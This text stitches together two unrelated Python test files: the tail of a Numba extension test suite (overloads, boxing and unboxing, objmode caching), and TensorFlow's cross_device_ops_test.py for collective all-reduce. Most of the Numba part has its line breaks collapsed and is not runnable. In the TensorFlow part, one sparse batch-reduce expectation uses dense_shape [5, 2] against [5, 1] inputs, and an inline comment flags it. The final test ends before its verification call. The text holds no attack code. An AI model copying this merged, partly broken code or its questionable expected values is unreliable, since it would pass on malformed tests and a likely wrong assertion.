bar(n): return foo(n) self.assertEqual(bar(3).tolist(), [0, 1, 2]) cbar = jit(nopython=True)(bar) with self.assertRaises(errors.TypingError) as raises: cbar(2) msg = ( "Only accept returning of array passed into the function as " "argument" ) self.assertIn(msg, str(raises.exception)) class TestImportCythonFunction(unittest.TestCase): @unittest.skipIf(sc is None, "Only run if SciPy >= 0.19 is installed") def test_getting_function(self): addr = get_cython_function_address( "scipy.special.cython_special", "j0" ) functype = ctypes.CFUNCTYPE(ctypes.c_double, ctypes.c_double) _j0 = functype(addr) j0 = jit(nopython=True)(lambda x: _j0(x)) self.assertEqual(j0(0), 1) def test_missing_module(self): with self.assertRaises(ImportError) as raises: get_cython_function_address("fakemodule", "fakefunction") # The quotes are not there in Python 2 msg = "No module named '?fakemodule'?" match = re.match(msg, str(raises.exception)) self.assertIsNotNone(match) @unittest.skipIf(sc is None, "Only run if SciPy >= 0.19 is installed") def test_missing_function(self): with self.assertRaises(ValueError) as raises: get_cython_function_address( "scipy.special.cython_special", "foo" ) msg = ( "No function 'foo' found in __pyx_capi__ of " "'scipy.special.cython_special'" ) self.assertEqual(msg, str(raises.exception)) @overload_method( MyDummyType, "method_jit_option_check_nrt", jit_options={"_nrt": True} ) def ov_method_jit_option_check_nrt(obj): def imp(obj): return np.arange(10) return imp @overload_method( MyDummyType, "method_jit_option_check_no_nrt", jit_options={"_nrt": False} ) def ov_method_jit_option_check_no_nrt(obj): def imp(obj): return np.arange(10) return imp @overload_attribute( MyDummyType, "attr_jit_option_check_nrt", jit_options={"_nrt": True} ) def ov_attr_jit_option_check_nrt(obj): def imp(obj): return np.arange(10) return imp @overload_attribute( MyDummyType, "attr_jit_option_check_no_nrt", jit_options={"_nrt": False} ) def ov_attr_jit_option_check_no_nrt(obj): def imp(obj): 
return np.arange(10) return imp class TestJitOptionsNoNRT(TestCase): # Test overload*(jit_options={...}) by turning off _nrt def check_error_no_nrt(self, func, *args, **kwargs): # Check that the compilation fails with a complaint about dynamic array msg = ( "Only accept returning of array passed into " "the function as argument" ) with self.assertRaises(errors.TypingError) as raises: func(*args, **kwargs) self.assertIn(msg, str(raises.exception)) def no_nrt_overload_check(self, flag): def dummy(): return np.arange(10) @overload(dummy, jit_options={"_nrt": flag}) def ov_dummy(): def dummy(): return np.arange(10) return dummy @njit def foo(): return dummy() if flag: self.assertPreciseEqual(foo(), np.arange(10)) else: self.check_error_no_nrt(foo) def test_overload_no_nrt(self): self.no_nrt_overload_check(True) self.no_nrt_overload_check(False) def test_overload_method_no_nrt(self): @njit def udt(x): return x.method_jit_option_check_nrt() self.assertPreciseEqual(udt(mydummy), np.arange(10)) @njit def udt(x): return x.method_jit_option_check_no_nrt() self.check_error_no_nrt(udt, mydummy) def test_overload_attribute_no_nrt(self): @njit def udt(x): return x.attr_jit_option_check_nrt self.assertPreciseEqual(udt(mydummy), np.arange(10)) @njit def udt(x): return x.attr_jit_option_check_no_nrt self.check_error_no_nrt(udt, mydummy) class TestBoxingCallingJIT(TestCase): def setUp(self): super().setUp() many = base_dummy_type_factory("mydummy2") self.DynTypeType, self.DynType, self.dyn_type_type = many self.dyn_type = self.DynType() def test_unboxer_basic(self): # Implements an unboxer on DynType that calls an intrinsic into the # unboxer code. 
        magic_token = 0xCAFE
        magic_offset = 123

        @intrinsic
        def my_intrinsic(typingctx, val):
            # An intrinsic that returns `val + magic_offset`
            def impl(context, builder, sig, args):
                [val] = args
                return builder.add(val, val.type(magic_offset))

            sig = signature(val, val)
            return sig, impl

        @unbox(self.DynTypeType)
        def unboxer(typ, obj, c):
            # The unboxer that calls some jitcode
            def bridge(x):
                # proof that this is a jit'ed context by calling jit only
                # intrinsic
                return my_intrinsic(x)

            # The incoming Python object `obj` is ignored; the unboxed native
            # value is the jit-computed magic_token + magic_offset.
            args = [c.context.get_constant(types.intp, magic_token)]
            sig = signature(types.voidptr, types.intp)
            is_error, res = c.pyapi.call_jit_code(bridge, sig, args)
            return NativeValue(res, is_error=is_error)

        @box(self.DynTypeType)
        def boxer(typ, val, c):
            # The boxer that returns an integer representation
            res = c.builder.ptrtoint(val, cgutils.intp_t)
            return c.pyapi.long_from_ssize_t(res)

        @njit
        def passthru(x):
            return x

        # Round-trip: unbox (runs the bridge), pass through, box back to int.
        out = passthru(self.dyn_type)
        self.assertEqual(out, magic_token + magic_offset)

    def test_unboxer_raise(self):
        # Testing exception raising in jitcode called from unboxing.
@unbox(self.DynTypeType) def unboxer(typ, obj, c): # The unboxer that calls some jitcode def bridge(x): if x > 0: raise ValueError("cannot be x > 0") return x args = [c.context.get_constant(types.intp, 1)] sig = signature(types.voidptr, types.intp) is_error, res = c.pyapi.call_jit_code(bridge, sig, args) return NativeValue(res, is_error=is_error) @box(self.DynTypeType) def boxer(typ, val, c): # The boxer that returns an integer representation res = c.builder.ptrtoint(val, cgutils.intp_t) return c.pyapi.long_from_ssize_t(res) @njit def passthru(x): return x with self.assertRaises(ValueError) as raises: passthru(self.dyn_type) self.assertIn( "cannot be x > 0", str(raises.exception), ) def test_boxer(self): # Call jitcode inside the boxer magic_token = 0xCAFE magic_offset = 312 @intrinsic def my_intrinsic(typingctx, val): # An intrinsic that returns `val + magic_offset` def impl(context, builder, sig, args): [val] = args return builder.add(val, val.type(magic_offset)) sig = signature(val, val) return sig, impl @unbox(self.DynTypeType) def unboxer(typ, obj, c): return NativeValue(c.context.get_dummy_value()) @box(self.DynTypeType) def boxer(typ, val, c): # Note: this doesn't do proper error handling def bridge(x): return my_intrinsic(x) args = [c.context.get_constant(types.intp, magic_token)] sig = signature(types.intp, types.intp) is_error, res = c.pyapi.call_jit_code(bridge, sig, args) return c.pyapi.long_from_ssize_t(res) @njit def passthru(x): return x r = passthru(self.dyn_type) self.assertEqual(r, magic_token + magic_offset) def test_boxer_raise(self): # Call jitcode inside the boxer @unbox(self.DynTypeType) def unboxer(typ, obj, c): return NativeValue(c.context.get_dummy_value()) @box(self.DynTypeType) def boxer(typ, val, c): def bridge(x): if x > 0: raise ValueError("cannot do x > 0") return x args = [c.context.get_constant(types.intp, 1)] sig = signature(types.intp, types.intp) is_error, res = c.pyapi.call_jit_code(bridge, sig, args) # The error handling 
retval = cgutils.alloca_once(c.builder, c.pyapi.pyobj, zfill=True) with c.builder.if_then(c.builder.not_(is_error)): obj = c.pyapi.long_from_ssize_t(res) c.builder.store(obj, retval) return c.builder.load(retval) @njit def passthru(x): return x with self.assertRaises(ValueError) as raises: passthru(self.dyn_type) self.assertIn( "cannot do x > 0", str(raises.exception), ) def with_objmode_cache_ov_example(x): # This is the function stub for overloading inside # TestCachingOverloadObjmode.test_caching_overload_objmode pass class TestCachingOverloadObjmode(TestCase): """Test caching of the use of overload implementations that use `with objmode` """ _numba_parallel_test_ = False def setUp(self): warnings.simplefilter("error", errors.NumbaWarning) def tearDown(self): warnings.resetwarnings() def test_caching_overload_objmode(self): cache_dir = temp_directory(self.__class__.__name__) with override_config("CACHE_DIR", cache_dir): def realwork(x): # uses numpy code arr = np.arange(x) / x return np.linalg.norm(arr) def python_code(x): # create indirections return realwork(x) @overload(with_objmode_cache_ov_example) def _ov_with_objmode_cache_ov_example(x): def impl(x): with objmode(y="float64"): y = python_code(x) return y return impl @njit(cache=True) def testcase(x): return with_objmode_cache_ov_example(x) expect = realwork(123) got = testcase(123) self.assertEqual(got, expect) testcase_cached = njit(cache=True)(testcase.py_func) got = testcase_cached(123) self.assertEqual(got, expect) @classmethod def check_objmode_cache_ndarray(cls): def do_this(a, b): return np.sum(a + b) def do_something(a, b): return np.sum(a + b) @overload(do_something) def overload_do_something(a, b): def _do_something_impl(a, b): with objmode(y='float64'): y = do_this(a, b) return y return _do_something_impl @njit(cache=True) def test_caching(): a = np.arange(20) b = np.arange(20) return do_something(a, b) got = test_caching() expect = test_caching.py_func() # Check result if got != expect: raise 
AssertionError("incorrect result") return test_caching @classmethod def check_objmode_cache_ndarray_check_cache(cls): disp = cls.check_objmode_cache_ndarray() if len(disp.stats.cache_misses) != 0: raise AssertionError('unexpected cache miss') if len(disp.stats.cache_hits) <= 0: raise AssertionError("unexpected missing cache hit") def test_check_objmode_cache_ndarray(self): # See issue #6130. # Env is missing after cache load. cache_dir = temp_directory(self.__class__.__name__) with override_config("CACHE_DIR", cache_dir): # Test in local process to populate the cache. self.check_objmode_cache_ndarray() # Run in new process to use the cache in a fresh process. res = run_in_new_process_in_cache_dir( self.check_objmode_cache_ndarray_check_cache, cache_dir ) self.assertEqual(res['exitcode'], 0) class TestMisc(TestCase): def test_is_jitted(self): def foo(x): pass self.assertFalse(is_jitted(foo)) self.assertTrue(is_jitted(njit(foo))) self.assertFalse(is_jitted(vectorize(foo))) self.assertFalse(is_jitted(vectorize(parallel=True)(foo))) self.assertFalse( is_jitted(guvectorize("void(float64[:])", "(m)")(foo)) ) class TestOverloadPreferLiteral(TestCase): def test_overload(self): def prefer_lit(x): pass def non_lit(x): pass def ov(x): if isinstance(x, types.IntegerLiteral): # With prefer_literal=False, this branch will not be reached. 
if x.literal_value == 1: def impl(x): return 0xcafe return impl else: raise errors.TypingError('literal value') else: def impl(x): return x * 100 return impl overload(prefer_lit, prefer_literal=True)(ov) overload(non_lit)(ov) @njit def check_prefer_lit(x): return prefer_lit(1), prefer_lit(2), prefer_lit(x) a, b, c = check_prefer_lit(3) self.assertEqual(a, 0xcafe) self.assertEqual(b, 200) self.assertEqual(c, 300) @njit def check_non_lit(x): return non_lit(1), non_lit(2), non_lit(x) a, b, c = check_non_lit(3) self.assertEqual(a, 100) self.assertEqual(b, 200) self.assertEqual(c, 300) def test_overload_method(self): def ov(self, x): if isinstance(x, types.IntegerLiteral): # With prefer_literal=False, this branch will not be reached. if x.literal_value == 1: def impl(self, x): return 0xcafe return impl else: raise errors.TypingError('literal value') else: def impl(self, x): return x * 100 return impl overload_method( MyDummyType, "method_prefer_literal", prefer_literal=True, )(ov) overload_method( MyDummyType, "method_non_literal", prefer_literal=False, )(ov) @njit def check_prefer_lit(dummy, x): return ( dummy.method_prefer_literal(1), dummy.method_prefer_literal(2), dummy.method_prefer_literal(x), ) a, b, c = check_prefer_lit(MyDummy(), 3) self.assertEqual(a, 0xcafe) self.assertEqual(b, 200) self.assertEqual(c, 300) @njit def check_non_lit(dummy, x): return ( dummy.method_non_literal(1), dummy.method_non_literal(2), dummy.method_non_literal(x), ) a, b, c = check_non_lit(MyDummy(), 3) self.assertEqual(a, 100) self.assertEqual(b, 200) self.assertEqual(c, 300) if __name__ == "__main__": unittest.main()
# ============================================================================
# cross_device_ops_test.py — second source file concatenated into this chunk.
# ============================================================================
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for CrossDeviceOps."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import collections
import os
import threading
import time

from absl.testing import parameterized

from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib
from tensorflow.python.distribute import collective_util
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.util import nest

# Short aliases used throughout the tests.
CollectiveReplicaLauncher = cross_device_utils.CollectiveReplicaLauncher
CommunicationImplementation = collective_util.CommunicationImplementation
ReduceOp = reduce_util.ReduceOp
IndexedSlicesValue = indexed_slices.IndexedSlicesValue
IndexedSlices = indexed_slices.IndexedSlices


def make_per_replica_value(value, devices):
  """Creates a `PerReplica` object whose values reside in `devices`.

  Args:
    value: a tensor-convertible value or a `IndexedSlicesValue`, or a callable
      that takes one argument (`device_idx`) and should return the value that
      is going to be created on devices[device_idx].
    devices: a list of device strings to create `PerReplica` values on.

  Returns:
    A `PerReplica` object.
  """
  values = []
  for device_idx, device in enumerate(devices):
    # Resolve the per-device value: callable > list-of-values > broadcast.
    if callable(value):
      v = value(device_idx)
    elif isinstance(value, list):
      v = value[device_idx]
    else:
      v = value
    # array_ops.identity pins a copy of the value onto the target device.
    if isinstance(v, IndexedSlicesValue):
      with ops.device(device):
        values.append(
            IndexedSlices(
                values=array_ops.identity(v.values),
                indices=array_ops.identity(v.indices),
                dense_shape=array_ops.identity(v.dense_shape)))
    else:
      with ops.device(device):
        values.append(array_ops.identity(v))
  return value_lib.PerReplica(values)


def enable_collective_ops():
  """Enable collectives in the current process."""
  cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
  context.context().configure_collective_ops(
      collective_leader="'/job:worker/replica:0/task:0'")
  config_proto = config_pb2.ConfigProto()
  config_proto.experimental.collective_group_leader = (
      "/job:worker/replica:0/task:0")
  server_def = tensorflow_server_pb2.ServerDef(
      cluster=cluster_resolver.cluster_spec().as_cluster_def(),
      default_session_config=config_proto,
      job_name=cluster_resolver.task_type,
      task_index=cluster_resolver.task_id,
      protocol=cluster_resolver.rpc_layer)
  context.context().enable_collective_ops(server_def)
  # Recover default flag values.
  CollectiveReplicaLauncher._prefer_unique_instance_key = True
  CollectiveReplicaLauncher._prefer_ordering_token = False


class MultiProcessPoolRunner():
  # Thin wrapper that builds a cluster spec and owns the pooled runner.

  def __init__(self, num_processes):
    cluster_spec_dict = multi_worker_test_base.create_cluster_spec(
        num_workers=num_processes)
    self.runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec_dict)


# Global MultiProcessPoolRunners that can be shared by test cases to avoid
# expensive initialization cost of TensorFlow in new processes.
#
# Note that they have to be globals and can't be owned by test classes because
# usually fn captures the test class instance, and test class
# instance can't be pickled if it has mpr as a member (it is not allowed to
# pickle Process objects).
# TODO(crccw): Use `num_workers` combination once it is ready.
global_mpr_2p = MultiProcessPoolRunner(num_processes=2)
global_mpr_1p = MultiProcessPoolRunner(num_processes=1)


def get_global_mpr(num_processes):
  # Map a process count to the matching shared pool runner.
  if num_processes == 1:
    return global_mpr_1p.runner
  elif num_processes == 2:
    return global_mpr_2p.runner
  else:
    raise ValueError("get_global_mpr: num_processes must be 1 or 2, got %d" %
                     num_processes)


class CollectiveOpsTest(test.TestCase, parameterized.TestCase):

  def setUp(self):
    super().setUp()
    # Enabling collectives can be done in "setUpClass", but requires using
    # different collective_keys in different tests as collectives are reused
    # across tests. Always resetting collective ops before each test offers
    # better test isolation.
    global_mpr_1p.runner.run(enable_collective_ops)
    global_mpr_2p.runner.run(enable_collective_ops)

  def make_collective(self, num_processes, gpu_per_process):
    """Returns collectives and other info to be used in tests.

    Args:
      num_processes: an integer indicating the number of processes that
        participate in the collective.
      gpu_per_process: number of GPUs (0 if no GPUs) used by each process.

    Returns:
      A tuple of (collective, devices, pid) where collective is a instance
      of `CollectiveAllReduce`, devices are a list of local devices (str)
      attached to the current process, and pid is the id of this process among
      all participant processes.
    """
    cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
    devices = [
        "/job:worker/replica:0/task:%d/device:CPU:0" % cluster_resolver.task_id
    ]
    if gpu_per_process > 0:
      # GPU devices replace (not extend) the CPU device list.
      devices = [
          "/job:worker/replica:0/task:%d/device:GPU:%d" %
          (cluster_resolver.task_id, i) for i in range(gpu_per_process)
      ]
    group_size = num_processes * len(devices)
    collective = cross_device_ops_lib.CollectiveAllReduce(
        devices=devices, group_size=group_size)
    return collective, devices, cluster_resolver.task_id

  def as_list(self, value):
    """A utility to convert a `Mirrored`, `Tensor` or `IndexedSlices` to a list.

    The reason it exists is to provide a uniformed view of returned value of
    "reduce" calls, especially across tf.function boundaries. Returning
    `Mirrored` from a tf.function will only evaluate the primary value, which
    makes collective ops of non-primary device being pruned, and will
    eventually cause hanging.

    Args:
      value: the value to convert, can be one of `Mirrored`, `Tensor` and
        `IndexedSlices`.

    Returns:
      A list of `Tensor` or `IndexedSlices`.
    """
    if isinstance(value, ops.Tensor):
      return [value]
    elif isinstance(value, IndexedSlices):
      return [value]
    elif isinstance(value, value_lib.Mirrored):
      return value.values
    else:
      raise ValueError("unwrap: unsupported input type: %s" % type(value))

  RunOptions = collections.namedtuple(  # pylint: disable=invalid-name
      "RunOptions",
      [
          "mode",  # A list of str from ["eager", "func_graph"]
          "num_processes",
          "gpus_per_process",
          "reduce_op",
          "communication_options",
          "prefer_unique_instance_key",
      ])
  RunOptions.__new__.__defaults__ = (["eager", "func_graph"], 2, 0,
                                     ReduceOp.SUM, collective_util.Options(),
                                     True)

  def reduce_and_verify(self, inputs, expect, options):
    """Reduce the given `inputs` and verify the output matches `expect`.

    Args:
      inputs: a list of `Tensor` or `IndexedSlices`, where i-th value will be
        fed to i-th replica.
      expect: a `Tensor` or `IndexedSlices`. This should be the expected value
        for one replica.
      options: a `RunOptions` instance.
    """

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          options.prefer_unique_instance_key)
      collective, devices, pid = self.make_collective(options.num_processes,
                                                      options.gpus_per_process)

      def reduce_fn():
        # `inputs` is flat across all replicas; this process owns the slice
        # starting at pid * len(devices).
        value_fn = lambda device_idx: inputs[pid * len(devices) + device_idx]
        per_replica_value = make_per_replica_value(value_fn, devices)
        reduced_values = collective.reduce(options.reduce_op, per_replica_value,
                                           per_replica_value,
                                           options.communication_options)
        if options.gpus_per_process > 1:
          self.assertIsInstance(reduced_values, value_lib.Mirrored)
        reduced_values = self.as_list(reduced_values)
        self.assertAllEqual(devices, [v.device for v in reduced_values])
        return [ops.convert_to_tensor(v) for v in reduced_values]

      per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)

      if "eager" in options.mode:
        got = reduce_fn()
        self.assertAllClose(got, per_replica_expect)

      if "func_graph" in options.mode:
        got = def_function.function(reduce_fn)()
        self.assertAllClose(got, per_replica_expect)

    get_global_mpr(options.num_processes).run(replica_fn)

  def batch_reduce_and_verify(self, inputs, expect, options):
    """Batch reduce the given `inputs` and verify the output matches `expect`.

    Args:
      inputs: a 2-level nested list of `Tensor` or `IndexedSlices`, where i-th
        value will be fed to i-th replica.
      expect: a list of `Tensor` or `IndexedSlices`. This should be the
        expected value for one replica.
      options: a `RunOptions` instance.
    """

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          options.prefer_unique_instance_key)
      collective, devices, pid = self.make_collective(options.num_processes,
                                                      options.gpus_per_process)

      def batch_reduce_fn():
        batch_size = len(inputs[0])
        value_dst_pairs = []
        for i in range(batch_size):

          # idx=i binds the loop variable eagerly (avoids late-binding bug).
          def value_fn(device_idx, idx=i):
            return inputs[pid * len(devices) + device_idx][idx]

          per_replica_value = make_per_replica_value(value_fn, devices)
          value_dst_pairs.append((per_replica_value, per_replica_value))
        reduced_values = collective.batch_reduce(options.reduce_op,
                                                 value_dst_pairs,
                                                 options.communication_options)
        if options.gpus_per_process > 1:
          for v in reduced_values:
            self.assertIsInstance(v, value_lib.Mirrored)
        reduced_values = [self.as_list(v) for v in reduced_values]
        for v in reduced_values:
          self.assertAllEqual(devices, [t.device for t in v])
        return nest.map_structure(ops.convert_to_tensor, reduced_values)

      per_replica_expect = nest.map_structure(
          lambda x: [ops.convert_to_tensor(x)] * len(devices), expect)

      if "eager" in options.mode:
        got = batch_reduce_fn()
        self.assertAllClose(got, per_replica_expect)

      if "func_graph" in options.mode:
        got = def_function.function(batch_reduce_fn)()
        self.assertAllClose(got, per_replica_expect)

    get_global_mpr(options.num_processes).run(replica_fn)

  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
          prefer_unique_instance_key=[True, False]))
  def testReduceDense(self, num_processes, required_gpus, implementation,
                      reduce_op, prefer_unique_instance_key):
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")
    if (num_processes == 2 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
                    "physical GPUs for every process.")

    options = self.RunOptions(
        num_processes=num_processes,
        gpus_per_process=required_gpus,
        reduce_op=reduce_op,
        communication_options=collective_util.Options(
            implementation=implementation),
        prefer_unique_instance_key=prefer_unique_instance_key)
    group_size = options.num_processes * (options.gpus_per_process or 1)

    inputs_data = [1.0, 2.0, 3.0, 4.0]
    inputs = inputs_data[0:group_size]

    if group_size == 1:
      expect = 1.0
    if group_size == 2:
      expect = 3.0 if reduce_op == ReduceOp.SUM else 1.5
    elif group_size == 4:
      expect = 10.0 if reduce_op == ReduceOp.SUM else 2.5

    self.reduce_and_verify(inputs, expect, options)

  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          # TODO(b/166682130): add MEAN reduce once the bug is fixed.
          reduce_op=ReduceOp.SUM,
          prefer_unique_instance_key=[True, False]))
  def testReduceSparse(self, num_processes, required_gpus, implementation,
                       reduce_op, prefer_unique_instance_key):
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")
    if (num_processes == 2 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
                    "physical GPUs for every process.")

    options = self.RunOptions(
        mode=["func_graph"],  # Sparse reduce is not supported in eager.
        num_processes=num_processes,
        gpus_per_process=required_gpus,
        reduce_op=reduce_op,
        communication_options=collective_util.Options(
            implementation=implementation),
        prefer_unique_instance_key=prefer_unique_instance_key)
    group_size = options.num_processes * (options.gpus_per_process or 1)

    inputs_data = [
        IndexedSlicesValue(
            values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[3.], [4.]], indices=[1, 2], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[5.], [6.]], indices=[7, 8], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[7.], [8.]], indices=[3, 2], dense_shape=[10, 1]),
    ]
    inputs = inputs_data[0:group_size]

    if group_size == 1:
      expect = IndexedSlices(
          values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1])
    elif group_size == 2:
      expect = IndexedSlices(
          values=[[1.], [2.], [3.], [4.]],
          indices=[0, 1, 1, 2],
          dense_shape=[10, 1])
    elif group_size == 4:
      expect = IndexedSlices(
          values=[[1.], [2.], [3.], [4.], [5.], [6.], [7.], [8.]],
          indices=[0, 1, 1, 2, 7, 8, 3, 2],
          dense_shape=[10, 1])
    self.reduce_and_verify(inputs, expect, options)

  @combinations.generate(
      combinations.combine(prefer_unique_instance_key=[True, False]))
  def testReduceSparseVariableLength(self, prefer_unique_instance_key):
    # One device per process, 2 processes, 2 replicas in total.
    inputs = [
        IndexedSlicesValue(values=[[1.]], indices=[0], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[2.], [3.], [4.]], indices=[0, 1, 2], dense_shape=[10, 1]),
    ]
    expect = IndexedSlices(
        values=[[1.], [2.], [3.], [4.]],
        indices=[0, 0, 1, 2],
        dense_shape=[10, 1])
    self.reduce_and_verify(
        inputs, expect,
        self.RunOptions(
            mode=["func_graph"],  # Sparse reduce is not supported in eager.
            num_processes=2,
            reduce_op=ReduceOp.SUM,
            prefer_unique_instance_key=prefer_unique_instance_key))

  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
          prefer_unique_instance_key=[True, False]))
  def testBatchReduceDense(self, num_processes, required_gpus, implementation,
                           reduce_op, prefer_unique_instance_key):
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")
    if (num_processes == 2 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
                    "physical GPUs for every process.")

    options = self.RunOptions(
        num_processes=num_processes,
        gpus_per_process=required_gpus,
        reduce_op=reduce_op,
        communication_options=collective_util.Options(
            implementation=implementation),
        prefer_unique_instance_key=prefer_unique_instance_key)
    group_size = options.num_processes * (options.gpus_per_process or 1)

    inputs_data = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0], [7.0, 8.0]]
    inputs = inputs_data[0:group_size]

    if group_size == 1:
      expect = [1.0, 2.0]
    if group_size == 2:
      expect = [4.0, 6.0] if reduce_op == ReduceOp.SUM else [2.0, 3.0]
    elif group_size == 4:
      expect = [16.0, 20.0] if reduce_op == ReduceOp.SUM else [4.0, 5.0]

    self.batch_reduce_and_verify(inputs, expect, options)

  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          # TODO(b/166682130): add MEAN reduce once the bug is fixed.
          reduce_op=ReduceOp.SUM,
          prefer_unique_instance_key=[True, False]))
  def testBatchReduceSparse(self, num_processes, required_gpus, implementation,
                            reduce_op, prefer_unique_instance_key):
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")
    if (num_processes == 2 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
                    "physical GPUs for every process.")

    options = self.RunOptions(
        mode=["func_graph"],  # Sparse reduce is not supported in eager.
        num_processes=num_processes,
        gpus_per_process=required_gpus,
        reduce_op=reduce_op,
        communication_options=collective_util.Options(
            implementation=implementation),
        prefer_unique_instance_key=prefer_unique_instance_key)
    group_size = options.num_processes * (options.gpus_per_process or 1)

    inputs_data = ([
        IndexedSlicesValue(
            values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
    ], [
        IndexedSlicesValue(
            values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
    ], [
        IndexedSlicesValue(
            values=[[9.], [10.]], indices=[3, 4], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[11.], [12.]], indices=[3, 4], dense_shape=[5, 1])
    ], [
        IndexedSlicesValue(
            values=[[13.], [14.]], indices=[8, 9], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[15.], [16.]], indices=[3, 4], dense_shape=[5, 1])
    ])
    inputs = inputs_data[0:group_size]

    if group_size == 1:
      expect = [
          IndexedSlices(
              values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
          IndexedSlices(
              values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
      ]
    if group_size == 2:
      expect = [
          IndexedSlices(
              values=[[1.], [2.], [5.], [6.]],
              indices=[0, 1, 1, 2],
              dense_shape=[10, 1]),
          IndexedSlices(
              values=[[3.], [4.], [7.], [8.]],
              indices=[1, 2, 0, 1],
              dense_shape=[5, 1])
      ]
    elif group_size == 4:
      expect = [
          IndexedSlices(
              values=[[1.], [2.], [5.], [6.], [9.], [10.], [13.], [14.]],
              indices=[0, 1, 1, 2, 3, 4, 8, 9],
              dense_shape=[10, 1]),
          # NOTE(review): dense_shape=[5, 2] looks inconsistent with the
          # [5, 1] inputs above — confirm whether this is intentional.
          IndexedSlices(
              values=[[3.], [4.], [7.], [8.], [11.], [12.], [15.], [16.]],
              indices=[1, 2, 0, 1, 3, 4, 3, 4],
              dense_shape=[5, 2])
      ]
    self.batch_reduce_and_verify(inputs, expect, options)

  def testBatchReduceMixedDenseAndSparse(self):
    options = self.RunOptions(
        num_processes=2,
        gpus_per_process=0,
        reduce_op=ReduceOp.SUM,
        mode=["func_graph"])

    inputs_data = [
        [
            1.0, 2.0,
            IndexedSlicesValue(
                values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
            IndexedSlicesValue(
                values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
        ],
        [
            3.0, 4.0,
            IndexedSlicesValue(
                values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
            IndexedSlicesValue(
                values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
        ],
    ]

    expect = [
        4.0, 6.0,
        IndexedSlices(
            values=[[1.], [2.], [5.], [6.]],
            indices=[0, 1, 1, 2],
            dense_shape=[10, 1]),
        IndexedSlices(
            values=[[3.], [4.], [7.], [8.]],
            indices=[1, 2, 0, 1],
            dense_shape=[5, 1])
    ]

